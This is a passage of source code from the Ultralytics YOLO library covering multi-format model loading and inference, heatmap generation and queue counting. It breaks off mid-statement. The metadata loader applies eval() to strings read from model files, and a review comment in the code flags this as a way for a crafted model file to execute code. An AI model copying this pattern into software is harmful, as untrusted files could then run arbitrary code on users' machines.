        fuse (bool): Fuse Conv2D + BatchNorm layers for optimization. Defaults to True.
        verbose (bool): Enable verbose logging. Defaults to True.

    Raises:
        NotImplementedError: If the weights are in TF.js format.
        TypeError: If the weights are in none of the supported formats.

    Note:
        The final statement copies every local variable of this method onto the instance, so local
        names used here (e.g. `session`, `bindings`, `net`, `names`, `stride`) become attributes.
        Renaming or removing a local changes the instance's attributes.
    """
    super().__init__()
    # When a list of weights is given, only the first entry is used to detect the format
    w = str(weights[0] if isinstance(weights, list) else weights)
    nn_module = isinstance(weights, torch.nn.Module)
    (
        pt,
        jit,
        onnx,
        xml,
        engine,
        coreml,
        saved_model,
        pb,
        tflite,
        edgetpu,
        tfjs,
        paddle,
        mnn,
        ncnn,
        imx,
        triton,
    ) = self._model_type(w)
    fp16 &= pt or jit or onnx or xml or engine or nn_module or triton  # FP16
    nhwc = coreml or saved_model or pb or tflite or edgetpu  # BHWC formats (vs torch BCWH)
    stride = 32  # default stride
    model, metadata, task = None, None, None

    # Set device
    cuda = torch.cuda.is_available() and device.type != "cpu"  # use CUDA
    if cuda and not any([nn_module, pt, jit, engine, onnx]):  # GPU dataloader formats
        # All other formats are run with the torch-side device forced to CPU
        device = torch.device("cpu")
        cuda = False

    # Download if not local
    if not (pt or triton or nn_module):
        w = attempt_download_asset(w)

    # In-memory PyTorch model
    if nn_module:
        model = weights.to(device)
        if fuse:
            model = model.fuse(verbose=verbose)
        if hasattr(model, "kpt_shape"):
            kpt_shape = model.kpt_shape  # pose-only
        stride = max(int(model.stride.max()), 32)  # model stride
        names = model.module.names if hasattr(model, "module") else model.names  # get class names
        model.half() if fp16 else model.float()
        self.model = model  # explicitly assign for to(), cpu(), cuda(), half()
        pt = True  # from here on an in-memory module is handled like a PyTorch checkpoint

    # PyTorch
    elif pt:
        from ultralytics.nn.tasks import attempt_load_weights

        model = attempt_load_weights(
            weights if isinstance(weights, list) else w, device=device, inplace=True, fuse=fuse
        )
        if hasattr(model, "kpt_shape"):
            kpt_shape = model.kpt_shape  # pose-only
        stride = max(int(model.stride.max()), 32)  # model stride
        names = model.module.names if hasattr(model, "module") else model.names  # get class names
        model.half() if fp16 else model.float()
        self.model = model  # explicitly assign for to(), cpu(), cuda(), half()

    # TorchScript
    elif jit:
        LOGGER.info(f"Loading {w} for TorchScript inference...")
        extra_files = {"config.txt": ""}  # model metadata
        model = torch.jit.load(w, _extra_files=extra_files, map_location=device)
        model.half() if fp16 else model.float()
        if extra_files["config.txt"]:  # load metadata dict
            metadata = json.loads(extra_files["config.txt"], object_hook=lambda x: dict(x.items()))

    # ONNX OpenCV DNN
    elif dnn:
        LOGGER.info(f"Loading {w} for ONNX OpenCV DNN inference...")
        check_requirements("opencv-python>=4.5.4")
        net = cv2.dnn.readNetFromONNX(w)

    # ONNX Runtime and IMX
    elif onnx or imx:
        LOGGER.info(f"Loading {w} for ONNX Runtime inference...")
        check_requirements(("onnx", "onnxruntime-gpu" if cuda else "onnxruntime"))
        if IS_RASPBERRYPI or IS_JETSON:
            # Fix 'numpy.linalg._umath_linalg' has no attribute '_ilp64' for TF SavedModel on RPi and Jetson
            check_requirements("numpy==1.23.5")
        import onnxruntime

        providers = onnxruntime.get_available_providers()
        if not cuda and "CUDAExecutionProvider" in providers:
            providers.remove("CUDAExecutionProvider")
        elif cuda and "CUDAExecutionProvider" not in providers:
            LOGGER.warning("WARNING ⚠️ Failed to start ONNX Runtime session with CUDA. Falling back to CPU...")
            device = torch.device("cpu")
            cuda = False
        LOGGER.info(f"Preferring ONNX Runtime {providers[0]}")
        if onnx:
            session = onnxruntime.InferenceSession(w, providers=providers)
        else:
            # IMX: `w` is a directory; the first *.onnx file inside it is loaded on the CPU provider
            check_requirements(
                ["model-compression-toolkit==2.1.1", "sony-custom-layers[torch]==0.2.0", "onnxruntime-extensions"]
            )
            w = next(Path(w).glob("*.onnx"))
            LOGGER.info(f"Loading {w} for ONNX IMX inference...")
            import mct_quantizers as mctq
            from sony_custom_layers.pytorch.object_detection import nms_ort  # noqa

            session = onnxruntime.InferenceSession(
                w, mctq.get_ort_session_options(), providers=["CPUExecutionProvider"]
            )
            task = "detect"

        output_names = [x.name for x in session.get_outputs()]
        metadata = session.get_modelmeta().custom_metadata_map
        # A string in the first output dimension is treated as a dynamic (symbolic) shape
        dynamic = isinstance(session.get_outputs()[0].shape[0], str)
        if not dynamic:
            # Static shapes: pre-allocate torch output buffers and bind them once via IO binding
            io = session.io_binding()
            bindings = []
            for output in session.get_outputs():
                y_tensor = torch.empty(output.shape, dtype=torch.float16 if fp16 else torch.float32).to(device)
                io.bind_output(
                    name=output.name,
                    device_type=device.type,
                    device_id=device.index if cuda else 0,
                    element_type=np.float16 if fp16 else np.float32,
                    shape=tuple(y_tensor.shape),
                    buffer_ptr=y_tensor.data_ptr(),
                )
                bindings.append(y_tensor)

    # OpenVINO
    elif xml:
        LOGGER.info(f"Loading {w} for OpenVINO inference...")
        check_requirements("openvino>=2024.0.0")
        import openvino as ov

        core = ov.Core()
        w = Path(w)
        if not w.is_file():  # if not *.xml
            w = next(w.glob("*.xml"))  # get *.xml file from *_openvino_model dir
        ov_model = core.read_model(model=str(w), weights=w.with_suffix(".bin"))
        if ov_model.get_parameters()[0].get_layout().empty:
            ov_model.get_parameters()[0].set_layout(ov.Layout("NCHW"))

        # OpenVINO inference modes are 'LATENCY', 'THROUGHPUT' (not recommended), or 'CUMULATIVE_THROUGHPUT'
        inference_mode = "CUMULATIVE_THROUGHPUT" if batch > 1 else "LATENCY"
        LOGGER.info(f"Using OpenVINO {inference_mode} mode for batch={batch} inference...")
        ov_compiled_model = core.compile_model(
            ov_model,
            device_name="AUTO",  # AUTO selects best available device, do not modify
            config={"PERFORMANCE_HINT": inference_mode},
        )
        input_name = ov_compiled_model.input().get_any_name()
        metadata = w.parent / "metadata.yaml"  # path only; loaded below if the file exists

    # TensorRT
    elif engine:
        LOGGER.info(f"Loading {w} for TensorRT inference...")
        try:
            import tensorrt as trt  # noqa https://developer.nvidia.com/nvidia-tensorrt-download
        except ImportError:
            if LINUX:
                check_requirements("tensorrt>7.0.0,!=10.1.0")
            import tensorrt as trt  # noqa
        check_version(trt.__version__, ">=7.0.0", hard=True)
        check_version(trt.__version__, "!=10.1.0", msg="https://github.com/ultralytics/ultralytics/pull/14239")
        if device.type == "cpu":
            device = torch.device("cuda:0")
        Binding = namedtuple("Binding", ("name", "dtype", "shape", "data", "ptr"))
        logger = trt.Logger(trt.Logger.INFO)
        # Read file
        with open(w, "rb") as f, trt.Runtime(logger) as runtime:
            try:
                meta_len = int.from_bytes(f.read(4), byteorder="little")  # read metadata length
                metadata = json.loads(f.read(meta_len).decode("utf-8"))  # read metadata
            except UnicodeDecodeError:
                f.seek(0)  # engine file may lack embedded Ultralytics metadata
            model = runtime.deserialize_cuda_engine(f.read())  # read engine

        # Model context
        try:
            context = model.create_execution_context()
        except Exception as e:  # model is None
            LOGGER.error(f"ERROR: TensorRT model exported with a different version than {trt.__version__}\n")
            raise e

        bindings = OrderedDict()
        output_names = []
        fp16 = False  # default updated below
        dynamic = False
        # The `num_bindings` attribute is absent on the TensorRT >= 10 API, which uses named IO tensors
        is_trt10 = not hasattr(model, "num_bindings")
        num = range(model.num_io_tensors) if is_trt10 else range(model.num_bindings)
        for i in num:
            if is_trt10:
                name = model.get_tensor_name(i)
                dtype = trt.nptype(model.get_tensor_dtype(name))
                is_input = model.get_tensor_mode(name) == trt.TensorIOMode.INPUT
                if is_input:
                    if -1 in tuple(model.get_tensor_shape(name)):
                        dynamic = True
                        # index [1] of the profile shape is used as the input shape
                        context.set_input_shape(name, tuple(model.get_tensor_profile_shape(name, 0)[1]))
                    if dtype == np.float16:
                        fp16 = True
                else:
                    output_names.append(name)
                shape = tuple(context.get_tensor_shape(name))
            else:  # TensorRT < 10.0
                name = model.get_binding_name(i)
                dtype = trt.nptype(model.get_binding_dtype(i))
                is_input = model.binding_is_input(i)
                if model.binding_is_input(i):
                    if -1 in tuple(model.get_binding_shape(i)):  # dynamic
                        dynamic = True
                        context.set_binding_shape(i, tuple(model.get_profile_shape(0, i)[1]))
                    if dtype == np.float16:
                        fp16 = True
                else:
                    output_names.append(name)
                shape = tuple(context.get_binding_shape(i))
            # Allocate a device buffer per binding and remember its raw pointer
            im = torch.from_numpy(np.empty(shape, dtype=dtype)).to(device)
            bindings[name] = Binding(name, dtype, shape, im, int(im.data_ptr()))
        binding_addrs = OrderedDict((n, d.ptr) for n, d in bindings.items())
        batch_size = bindings["images"].shape[0]  # if dynamic, this is instead max batch size

    # CoreML
    elif coreml:
        LOGGER.info(f"Loading {w} for CoreML inference...")
        import coremltools as ct

        model = ct.models.MLModel(w)
        metadata = dict(model.user_defined_metadata)

    # TF SavedModel
    elif saved_model:
        LOGGER.info(f"Loading {w} for TensorFlow SavedModel inference...")
        import tensorflow as tf

        keras = False  # assume TF1 saved_model
        model = tf.keras.models.load_model(w) if keras else tf.saved_model.load(w)
        metadata = Path(w) / "metadata.yaml"

    # TF GraphDef
    elif pb:  # https://www.tensorflow.org/guide/migrate#a_graphpb_or_graphpbtxt
        LOGGER.info(f"Loading {w} for TensorFlow GraphDef inference...")
        import tensorflow as tf

        from ultralytics.engine.exporter import gd_outputs

        def wrap_frozen_graph(gd, inputs, outputs):
            """Wrap frozen graphs for deployment."""
            x = tf.compat.v1.wrap_function(lambda: tf.compat.v1.import_graph_def(gd, name=""), [])  # wrapped
            ge = x.graph.as_graph_element
            return x.prune(tf.nest.map_structure(ge, inputs), tf.nest.map_structure(ge, outputs))

        gd = tf.Graph().as_graph_def()  # TF GraphDef
        with open(w, "rb") as f:
            gd.ParseFromString(f.read())
        frozen_func = wrap_frozen_graph(gd, inputs="x:0", outputs=gd_outputs(gd))
        try:  # find metadata in SavedModel alongside GraphDef
            metadata = next(Path(w).resolve().parent.rglob(f"{Path(w).stem}_saved_model*/metadata.yaml"))
        except StopIteration:
            pass

    # TFLite or TFLite Edge TPU
    elif tflite or edgetpu:  # https://www.tensorflow.org/lite/guide/python#install_tensorflow_lite_for_python
        try:  # https://coral.ai/docs/edgetpu/tflite-python/#update-existing-tf-lite-code-for-the-edge-tpu
            from tflite_runtime.interpreter import Interpreter, load_delegate
        except ImportError:
            import tensorflow as tf

            Interpreter, load_delegate = tf.lite.Interpreter, tf.lite.experimental.load_delegate
        if edgetpu:  # TF Edge TPU https://coral.ai/software/#edgetpu-runtime
            # NOTE(review): `device[3:]` slices `device` directly, which presumably requires a str such as
            # "tpu:0" here rather than a torch.device - confirm against callers
            device = device[3:] if str(device).startswith("tpu") else ":0"
            LOGGER.info(f"Loading {w} on device {device[1:]} for TensorFlow Lite Edge TPU inference...")
            delegate = {"Linux": "libedgetpu.so.1", "Darwin": "libedgetpu.1.dylib", "Windows": "edgetpu.dll"}[
                platform.system()
            ]
            interpreter = Interpreter(
                model_path=w,
                experimental_delegates=[load_delegate(delegate, options={"device": device})],
            )
            device = "cpu"  # Required, otherwise PyTorch will try to use the wrong device
        else:  # TFLite
            LOGGER.info(f"Loading {w} for TensorFlow Lite inference...")
            interpreter = Interpreter(model_path=w)  # load TFLite model
        interpreter.allocate_tensors()  # allocate
        input_details = interpreter.get_input_details()  # inputs
        output_details = interpreter.get_output_details()  # outputs
        # Load metadata
        try:
            # The .tflite file is opened as a zip archive; the first member is parsed as a Python literal
            with zipfile.ZipFile(w, "r") as model:
                meta_file = model.namelist()[0]
                metadata = ast.literal_eval(model.read(meta_file).decode("utf-8"))
        except zipfile.BadZipFile:
            pass

    # TF.js
    elif tfjs:
        raise NotImplementedError("YOLOv8 TF.js inference is not currently supported.")

    # PaddlePaddle
    elif paddle:
        LOGGER.info(f"Loading {w} for PaddlePaddle inference...")
        check_requirements("paddlepaddle-gpu" if cuda else "paddlepaddle")
        import paddle.inference as pdi  # noqa

        w = Path(w)
        if not w.is_file():  # if not *.pdmodel
            w = next(w.rglob("*.pdmodel"))  # get *.pdmodel file from *_paddle_model dir
        config = pdi.Config(str(w), str(w.with_suffix(".pdiparams")))
        if cuda:
            config.enable_use_gpu(memory_pool_init_size_mb=2048, device_id=0)
        predictor = pdi.create_predictor(config)
        input_handle = predictor.get_input_handle(predictor.get_input_names()[0])
        output_names = predictor.get_output_names()
        metadata = w.parents[1] / "metadata.yaml"

    # MNN
    elif mnn:
        LOGGER.info(f"Loading {w} for MNN inference...")
        check_requirements("MNN")  # requires MNN
        import os

        import MNN

        config = {}
        config["precision"] = "low"
        config["backend"] = "CPU"
        config["numThread"] = (os.cpu_count() + 1) // 2  # half of the CPUs, rounded up
        rt = MNN.nn.create_runtime_manager((config,))
        net = MNN.nn.load_module_from_file(w, [], [], runtime_manager=rt, rearrange=True)

        def torch_to_mnn(x):
            """Wrap a torch tensor's data pointer and shape as an MNN constant expression."""
            return MNN.expr.const(x.data_ptr(), x.shape)

        metadata = json.loads(net.get_info()["bizCode"])

    # NCNN
    elif ncnn:
        LOGGER.info(f"Loading {w} for NCNN inference...")
        check_requirements("git+https://github.com/Tencent/ncnn.git" if ARM64 else "ncnn")  # requires NCNN
        import ncnn as pyncnn

        net = pyncnn.Net()
        net.opt.use_vulkan_compute = cuda
        w = Path(w)
        if not w.is_file():  # if not *.param
            w = next(w.glob("*.param"))  # get *.param file from *_ncnn_model dir
        net.load_param(str(w))
        net.load_model(str(w.with_suffix(".bin")))
        metadata = w.parent / "metadata.yaml"

    # NVIDIA Triton Inference Server
    elif triton:
        check_requirements("tritonclient[all]")
        from ultralytics.utils.triton import TritonRemoteModel

        model = TritonRemoteModel(w)
        metadata = model.metadata

    # Any other format (unsupported)
    else:
        from ultralytics.engine.exporter import export_formats

        raise TypeError(
            f"model='{w}' is not a supported model format. Ultralytics supports: {export_formats()['Format']}\n"
            f"See https://docs.ultralytics.com/modes/predict for help."
        )

    # Load external metadata YAML
    if isinstance(metadata, (str, Path)) and Path(metadata).exists():
        metadata = yaml_load(metadata)
    if metadata and isinstance(metadata, dict):
        for k, v in metadata.items():
            if k in {"stride", "batch"}:
                metadata[k] = int(v)
            elif k in {"imgsz", "names", "kpt_shape"} and isinstance(v, str):
                # NOTE(review): eval() executes arbitrary expressions taken from model metadata, so a
                # crafted model file could run code here. The TFLite branch above already parses its
                # metadata with ast.literal_eval; consider the same here after confirming all exporters
                # write plain literals.
                metadata[k] = eval(v)
        stride = metadata["stride"]
        task = metadata["task"]
        batch = metadata["batch"]
        imgsz = metadata["imgsz"]
        names = metadata["names"]
        kpt_shape = metadata.get("kpt_shape")
    elif not (pt or triton or nn_module):
        LOGGER.warning(f"WARNING ⚠️ Metadata not found for 'model={weights}'")

    # Check names
    if "names" not in locals():  # names missing
        names = default_class_names(data)
    names = check_class_names(names)

    # Disable gradients
    if pt:
        for p in model.parameters():
            p.requires_grad = False

    # Every local defined above (including the unpacked format flags) becomes an instance attribute
    self.__dict__.update(locals())  # assign all variables to self
+ + Returns: + (tuple): Tuple containing the raw output tensor, and processed output for visualization (if visualize=True) + """ + b, ch, h, w = im.shape # batch, channel, height, width + if self.fp16 and im.dtype != torch.float16: + im = im.half() # to FP16 + if self.nhwc: + im = im.permute(0, 2, 3, 1) # torch BCHW to numpy BHWC shape(1,320,192,3) + + # PyTorch + if self.pt or self.nn_module: + y = self.model(im, augment=augment, visualize=visualize, embed=embed) + + # TorchScript + elif self.jit: + y = self.model(im) + + # ONNX OpenCV DNN + elif self.dnn: + im = im.cpu().numpy() # torch to numpy + self.net.setInput(im) + y = self.net.forward() + + # ONNX Runtime + elif self.onnx or self.imx: + if self.dynamic: + im = im.cpu().numpy() # torch to numpy + y = self.session.run(self.output_names, {self.session.get_inputs()[0].name: im}) + else: + if not self.cuda: + im = im.cpu() + self.io.bind_input( + name="images", + device_type=im.device.type, + device_id=im.device.index if im.device.type == "cuda" else 0, + element_type=np.float16 if self.fp16 else np.float32, + shape=tuple(im.shape), + buffer_ptr=im.data_ptr(), + ) + self.session.run_with_iobinding(self.io) + y = self.bindings + if self.imx: + # boxes, conf, cls + y = np.concatenate([y[0], y[1][:, :, None], y[2][:, :, None]], axis=-1) + + # OpenVINO + elif self.xml: + im = im.cpu().numpy() # FP32 + + if self.inference_mode in {"THROUGHPUT", "CUMULATIVE_THROUGHPUT"}: # optimized for larger batch-sizes + n = im.shape[0] # number of images in batch + results = [None] * n # preallocate list with None to match the number of images + + def callback(request, userdata): + """Places result in preallocated list using userdata index.""" + results[userdata] = request.results + + # Create AsyncInferQueue, set the callback and start asynchronous inference for each input image + async_queue = self.ov.runtime.AsyncInferQueue(self.ov_compiled_model) + async_queue.set_callback(callback) + for i in range(n): + # Start async 
inference with userdata=i to specify the position in results list + async_queue.start_async(inputs={self.input_name: im[i : i + 1]}, userdata=i) # keep image as BCHW + async_queue.wait_all() # wait for all inference requests to complete + y = np.concatenate([list(r.values())[0] for r in results]) + + else: # inference_mode = "LATENCY", optimized for fastest first result at batch-size 1 + y = list(self.ov_compiled_model(im).values()) + + # TensorRT + elif self.engine: + if self.dynamic and im.shape != self.bindings["images"].shape: + if self.is_trt10: + self.context.set_input_shape("images", im.shape) + self.bindings["images"] = self.bindings["images"]._replace(shape=im.shape) + for name in self.output_names: + self.bindings[name].data.resize_(tuple(self.context.get_tensor_shape(name))) + else: + i = self.model.get_binding_index("images") + self.context.set_binding_shape(i, im.shape) + self.bindings["images"] = self.bindings["images"]._replace(shape=im.shape) + for name in self.output_names: + i = self.model.get_binding_index(name) + self.bindings[name].data.resize_(tuple(self.context.get_binding_shape(i))) + + s = self.bindings["images"].shape + assert im.shape == s, f"input size {im.shape} {'>' if self.dynamic else 'not equal to'} max model size {s}" + self.binding_addrs["images"] = int(im.data_ptr()) + self.context.execute_v2(list(self.binding_addrs.values())) + y = [self.bindings[x].data for x in sorted(self.output_names)] + + # CoreML + elif self.coreml: + im = im[0].cpu().numpy() + im_pil = Image.fromarray((im * 255).astype("uint8")) + # im = im.resize((192, 320), Image.BILINEAR) + y = self.model.predict({"image": im_pil}) # coordinates are xywh normalized + if "confidence" in y: + raise TypeError( + "Ultralytics only supports inference of non-pipelined CoreML models exported with " + f"'nms=False', but 'model={w}' has an NMS pipeline created by an 'nms=True' export." 
+ ) + # TODO: CoreML NMS inference handling + # from ultralytics.utils.ops import xywh2xyxy + # box = xywh2xyxy(y['coordinates'] * [[w, h, w, h]]) # xyxy pixels + # conf, cls = y['confidence'].max(1), y['confidence'].argmax(1).astype(np.float32) + # y = np.concatenate((box, conf.reshape(-1, 1), cls.reshape(-1, 1)), 1) + elif len(y) == 1: # classification model + y = list(y.values()) + elif len(y) == 2: # segmentation model + y = list(reversed(y.values())) # reversed for segmentation models (pred, proto) + + # PaddlePaddle + elif self.paddle: + im = im.cpu().numpy().astype(np.float32) + self.input_handle.copy_from_cpu(im) + self.predictor.run() + y = [self.predictor.get_output_handle(x).copy_to_cpu() for x in self.output_names] + + # MNN + elif self.mnn: + input_var = self.torch_to_mnn(im) + output_var = self.net.onForward([input_var]) + y = [x.read() for x in output_var] + + # NCNN + elif self.ncnn: + mat_in = self.pyncnn.Mat(im[0].cpu().numpy()) + with self.net.create_extractor() as ex: + ex.input(self.net.input_names()[0], mat_in) + # WARNING: 'output_names' sorted as a temporary fix for https://github.com/pnnx/pnnx/issues/130 + y = [np.array(ex.extract(x)[1])[None] for x in sorted(self.net.output_names())] + + # NVIDIA Triton Inference Server + elif self.triton: + im = im.cpu().numpy() # torch to numpy + y = self.model(im) + + # TensorFlow (SavedModel, GraphDef, Lite, Edge TPU) + else: + im = im.cpu().numpy() + if self.saved_model: # SavedModel + y = self.model(im, training=False) if self.keras else self.model(im) + if not isinstance(y, list): + y = [y] + elif self.pb: # GraphDef + y = self.frozen_func(x=self.tf.constant(im)) + else: # Lite or Edge TPU + details = self.input_details[0] + is_int = details["dtype"] in {np.int8, np.int16} # is TFLite quantized int8 or int16 model + if is_int: + scale, zero_point = details["quantization"] + im = (im / scale + zero_point).astype(details["dtype"]) # de-scale + self.interpreter.set_tensor(details["index"], im) + 
self.interpreter.invoke() + y = [] + for output in self.output_details: + x = self.interpreter.get_tensor(output["index"]) + if is_int: + scale, zero_point = output["quantization"] + x = (x.astype(np.float32) - zero_point) * scale # re-scale + if x.ndim == 3: # if task is not classification, excluding masks (ndim=4) as well + # Denormalize xywh by image size. See https://github.com/ultralytics/ultralytics/pull/1695 + # xywh are normalized in TFLite/EdgeTPU to mitigate quantization error of integer models + if x.shape[-1] == 6: # end-to-end model + x[:, :, [0, 2]] *= w + x[:, :, [1, 3]] *= h + else: + x[:, [0, 2]] *= w + x[:, [1, 3]] *= h + if self.task == "pose": + x[:, 5::3] *= w + x[:, 6::3] *= h + y.append(x) + # TF segment fixes: export is reversed vs ONNX export and protos are transposed + if len(y) == 2: # segment with (det, proto) output order reversed + if len(y[1].shape) != 4: + y = list(reversed(y)) # should be y = (1, 116, 8400), (1, 160, 160, 32) + if y[1].shape[-1] == 6: # end-to-end model + y = [y[1]] + else: + y[1] = np.transpose(y[1], (0, 3, 1, 2)) # should be y = (1, 116, 8400), (1, 32, 160, 160) + y = [x if isinstance(x, np.ndarray) else x.numpy() for x in y] + + # for x in y: + # print(type(x), len(x)) if isinstance(x, (list, tuple)) else print(type(x), x.shape) # debug shapes + if isinstance(y, (list, tuple)): + if len(self.names) == 999 and (self.task == "segment" or len(y) == 2): # segments and names not defined + nc = y[0].shape[1] - y[1].shape[1] - 4 # y = (1, 32, 160, 160), (1, 116, 8400) + self.names = {i: f"class{i}" for i in range(nc)} + return self.from_numpy(y[0]) if len(y) == 1 else [self.from_numpy(x) for x in y] + else: + return self.from_numpy(y) + + def from_numpy(self, x): + """ + Convert a numpy array to a tensor. + + Args: + x (np.ndarray): The array to be converted. 
def warmup(self, imgsz=(1, 3, 640, 640)):
    """
    Run a dummy forward pass so later inference calls do not pay first-call setup cost.

    Nothing is executed unless at least one of the pt, jit, onnx, engine, saved_model, pb, triton or nn_module
    flags is set, and the model is either on a non-CPU device or served through Triton.

    Args:
        imgsz (tuple): The shape of the dummy input tensor in the format (batch_size, channels, height, width)
    """
    import torchvision  # noqa (import here so torchvision import time not recorded in postprocess time)

    backend_flags = (
        self.pt,
        self.jit,
        self.onnx,
        self.engine,
        self.saved_model,
        self.pb,
        self.triton,
        self.nn_module,
    )
    if not any(backend_flags):
        return
    if self.device.type == "cpu" and not self.triton:
        return

    dummy_dtype = torch.half if self.fp16 else torch.float
    dummy = torch.empty(*imgsz, dtype=dummy_dtype, device=self.device)  # input
    passes = 2 if self.jit else 1  # TorchScript gets two passes, every other backend one
    for _ in range(passes):
        self.forward(dummy)  # warmup
class Heatmap(ObjectCounter):
    """
    A class to draw heatmaps in real-time video streams based on object tracks.

    This class extends the ObjectCounter class to generate and visualize heatmaps of object movements in video
    streams. It uses tracked object positions to create a cumulative heatmap effect over time.

    Attributes:
        initialized (bool): Flag indicating whether the heatmap has been initialized.
        colormap (int): OpenCV colormap used for heatmap visualization.
        heatmap (np.ndarray): Array storing the cumulative heatmap data.
        annotator (Annotator): Object for drawing annotations on the image.

    Methods:
        heatmap_effect: Calculates and updates the heatmap effect for a given bounding box.
        generate_heatmap: Generates and applies the heatmap effect to each frame.

    Examples:
        >>> from ultralytics.solutions import Heatmap
        >>> heatmap = Heatmap(model="yolov8n.pt", colormap=cv2.COLORMAP_JET)
        >>> frame = cv2.imread("frame.jpg")
        >>> processed_frame = heatmap.generate_heatmap(frame)
    """

    def __init__(self, **kwargs):
        """Initializes the Heatmap class for real-time video stream heatmap generation based on object tracks."""
        super().__init__(**kwargs)

        self.initialized = False  # bool variable for heatmap initialization
        if self.region is not None:  # check if user provided the region coordinates
            self.initialize_region()

        # store colormap
        self.colormap = cv2.COLORMAP_PARULA if self.CFG["colormap"] is None else self.CFG["colormap"]

    def heatmap_effect(self, box):
        """
        Add a circular heat contribution centred on a bounding box to the cumulative heatmap.

        The circle's centre and radius come from the full box. The updated region is clipped to the heatmap
        bounds, so a box that extends past the frame edge (or has negative coordinates) only heats the part
        inside the frame, instead of producing a mask whose shape no longer matches the heatmap slice.

        Args:
            box (List[float]): Bounding box coordinates [x0, y0, x1, y1].

        Examples:
            >>> heatmap = Heatmap()
            >>> box = [100, 100, 200, 200]
            >>> heatmap.heatmap_effect(box)
        """
        x0, y0, x1, y1 = map(int, box)
        radius_squared = (min(x1 - x0, y1 - y0) // 2) ** 2
        center_x, center_y = (x0 + x1) // 2, (y0 + y1) // 2

        # Clip the region of interest (ROI) to the heatmap; negative starts would otherwise wrap around
        height, width = self.heatmap.shape[:2]
        roi_x0, roi_y0 = max(x0, 0), max(y0, 0)
        roi_x1, roi_y1 = min(x1, width), min(y1, height)
        if roi_x0 >= roi_x1 or roi_y0 >= roi_y1:
            return  # box is degenerate or lies completely outside the frame

        # Create a meshgrid over the ROI for vectorized distance calculations
        xv, yv = np.meshgrid(np.arange(roi_x0, roi_x1), np.arange(roi_y0, roi_y1))

        # Create a mask of points within the radius of the (unclipped) box center
        within_radius = (xv - center_x) ** 2 + (yv - center_y) ** 2 <= radius_squared

        # Update only the values within the ROI in a single vectorized operation
        self.heatmap[roi_y0:roi_y1, roi_x0:roi_x1][within_radius] += 2

    def generate_heatmap(self, im0):
        """
        Generate heatmap for each frame using Ultralytics.

        Args:
            im0 (np.ndarray): Input image array for processing.

        Returns:
            (np.ndarray): Processed image with heatmap overlay and object counts (if region is specified).

        Examples:
            >>> heatmap = Heatmap()
            >>> im0 = cv2.imread("image.jpg")
            >>> result = heatmap.generate_heatmap(im0)
        """
        if not self.initialized:
            self.heatmap = np.zeros_like(im0, dtype=np.float32)  # same shape as the frame, float accumulator
            self.initialized = True  # Initialize heatmap only once

        self.annotator = Annotator(im0, line_width=self.line_width)  # Initialize annotator
        self.extract_tracks(im0)  # Extract tracks

        # Iterate over bounding boxes, track ids and classes index
        for box, track_id, cls in zip(self.boxes, self.track_ids, self.clss):
            # Accumulate heat for this box
            self.heatmap_effect(box)

            if self.region is not None:
                self.annotator.draw_region(reg_pts=self.region, color=(104, 0, 123), thickness=self.line_width * 2)
                self.store_tracking_history(track_id, box)  # Store track history
                self.store_classwise_counts(cls)  # store classwise counts in dict
                current_centroid = ((box[0] + box[2]) / 2, (box[1] + box[3]) / 2)
                # Store tracking previous position and perform object counting
                prev_position = None
                if len(self.track_history[track_id]) > 1:
                    prev_position = self.track_history[track_id][-2]
                self.count_objects(current_centroid, track_id, prev_position, cls)  # Perform object counting

        if self.region is not None:
            self.display_counts(im0)  # Display the counts on the frame

        # Normalize, apply colormap to heatmap and combine with original image
        if self.track_data.id is not None:
            im0 = cv2.addWeighted(
                im0,
                0.5,
                cv2.applyColorMap(
                    cv2.normalize(self.heatmap, None, 0, 255, cv2.NORM_MINMAX).astype(np.uint8), self.colormap
                ),
                0.5,
                0,
            )

        self.display_output(im0)  # display output with base class function
        return im0  # return output image for more usage
YOLO 🚀, AGPL-3.0 license + +from ultralytics.solutions.solutions import BaseSolution +from ultralytics.utils.plotting import Annotator, colors + + +class QueueManager(BaseSolution): + """ + Manages queue counting in real-time video streams based on object tracks. + + This class extends BaseSolution to provide functionality for tracking and counting objects within a specified + region in video frames. + + Attributes: + counts (int): The current count of objects in the queue. + rect_color (Tuple[int, int, int]): RGB color tuple for drawing the queue region rectangle. + region_length (int): The number of points defining the queue region. + annotator (Annotator): An instance of the Annotator class for drawing on frames. + track_line (List[Tuple[int, int]]): List of track line coordinates. + track_history (Dict[int, List[Tuple[int, int]]]): Dictionary storing tracking history for each object. + + Methods: + initialize_region: Initializes the queue region. + process_queue: Processes a single frame for queue management. + extract_tracks: Extracts object tracks from the current frame. + store_tracking_history: Stores the tracking history for an object. + display_output: Displays the processed output. + + Examples: + >>> cap = cv2.VideoCapture("Path/to/video/file.mp4") + >>> queue_manager = QueueManager(region=[100, 100, 200, 200, 300, 300]) + >>> while cap.isOpened(): + >>> success, im0 = cap.read() + >>> if not success: + >>> break + >>> out = queue.process_queue(im0) + """ + + def __init__(self, **kwargs): + """Initializes the QueueManager with parameters for tracking and counting objects in a video stream.""" + super().__init__(**kwargs) + self.initialize_region() + self.counts = 0 # Queue counts Information + self.rect_color = (255, 255, 255) # Rectangle color + self.region_length = len(self.region) # Store region length for further usage + + def process_queue(self, im0): + """ + Processes the queue management for a single frame of video. 
+ + Args: + im0 (numpy.ndarray): Input image for processing, typically a frame from a video stream. + + Returns: + (numpy.ndarray): Processed image with annotations, bounding boxes, and queue counts. + + This method performs the following steps: + 1. Resets the queue count for the current frame. + 2. Initializes an Annotator object for drawing on the image. + 3. Extracts tracks from the image. + 4. Draws the counting region on the image. + 5. For each detected object: + - Draws bounding boxes and labels. + - Stores tracking history. + - Draws centroids and tracks. + - Checks if the object is inside the counting region and updates the count. + 6. Displays the queue count on the image. + 7. Displays the processed output. + + Examples: + >>> queue_manager = QueueManager() + >>> frame = cv2.imread("frame.jpg") + >>> processed_frame = queue_manager.process_queue(frame) + """ + self.counts = 0 # Reset counts every frame + self.annotator = Annotator(im0, line_width=self.line_width) # Initialize annotator + self.extract_tracks(im0) # Extract tracks + + self.annotator.draw_region( + reg_pts=self.region, color=self.rect_color, thickness=self.line_width * 2 + ) # Draw region + + for box, track_id, cls in zip(self.boxes, self.track_ids, self.clss): + # Draw bounding box and counting region + self.annotator.box_label(box, label=self.names[cls], color=colors(track_id, True)) + self.store_tracking_history(track_id, box) # Store track history + + # Draw tracks of objects + self.annotator.draw_centroid_and_tracks( + self.track_line, color=colors(int(track_id), True), track_thickness=self.line_width + ) + + # Cache frequently accessed attributes + track_history = self.track_history.get(track_id, []) + + # store previous position of track and check if the object is inside the counting region + prev_position = None + if len(track_history) > 1: + prev_position = track_history[-2] + if self.region_length >= 3 and prev_position and 